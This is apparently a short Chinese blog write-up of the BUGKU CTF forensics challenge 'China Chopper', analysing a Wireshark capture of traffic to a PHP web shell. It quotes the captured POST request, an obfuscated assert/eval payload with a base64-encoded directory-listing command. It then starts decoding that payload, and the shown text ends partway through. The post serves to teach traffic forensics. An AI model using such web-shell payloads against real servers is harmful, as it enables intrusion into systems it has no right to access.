目录
【BUGKU】CTF >>分析---中国菜刀
【BUGKU】CTF >>分析---中国菜刀
![](https://i-blog.csdnimg.cn/blog_migrate/5410d2243fde63b16120f8e5342a9d79.png)
解压完成后发现为pcapng文件格式
利用wireshark (我们的小鲨鱼)打开文件。
![](https://i-blog.csdnimg.cn/blog_migrate/1beb2d22ad1a279364446b4bcc83e91a.png)
![](https://i-blog.csdnimg.cn/blog_migrate/58cd6fcd59d2350fc61f983ceafade77.png)
![](https://i-blog.csdnimg.cn/blog_migrate/41c31ae83e649839448452098321bae2.png)
第一个数据包:
可以看出客户端用POST方式访问服务器的3.PHP文件
![](https://i-blog.csdnimg.cn/blog_migrate/810390cf24c339959ba6fe77ebad1ad8.png)
POST请求
![](https://i-blog.csdnimg.cn/blog_migrate/acb4b15f394c4b8033edb20afd472768.png)
123=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JEQ9J0M6XFx3d3dyb290XFwnOyRGPUBvcGVuZGlyKCREKTtpZigkRj09TlVMTCl7ZWNobygiRVJST1I6Ly8gUGF0aCBOb3QgRm91bmQgT3IgTm8gUGVybWlzc2lvbiEiKTt9ZWxzZXskTT1OVUxMOyRMPU5VTEw7d2hpbGUoJE49QHJlYWRkaXIoJEYpKXskUD0kRC4nLycuJE47JFQ9QGRhdGUoIlktbS1kIEg6aTpzIixAZmlsZW10aW1lKCRQKSk7QCRFPXN1YnN0cihiYXNlX2NvbnZlcnQoQGZpbGVwZXJtcygkUCksMTAsOCksLTQpOyRSPSJcdCIuJFQuIlx0Ii5AZmlsZXNpemUoJFApLiJcdCIuJEUuIlxuIjtpZihAaXNfZGlyKCRQKSkkTS49JE4uIi8iLiRSO2Vsc2UgJEwuPSROLiRSO31lY2hvICRNLiRMO0BjbG9zZWRpcigkRik7fTtlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");")); |
注:这是经过base64进行编码过的数据
base64解码:
@ini_set("display_errors","0"); @set_time_limit(0); if(PHP_VERSION<'5.3.0'){
@set_magic_quotes_runtime(0); |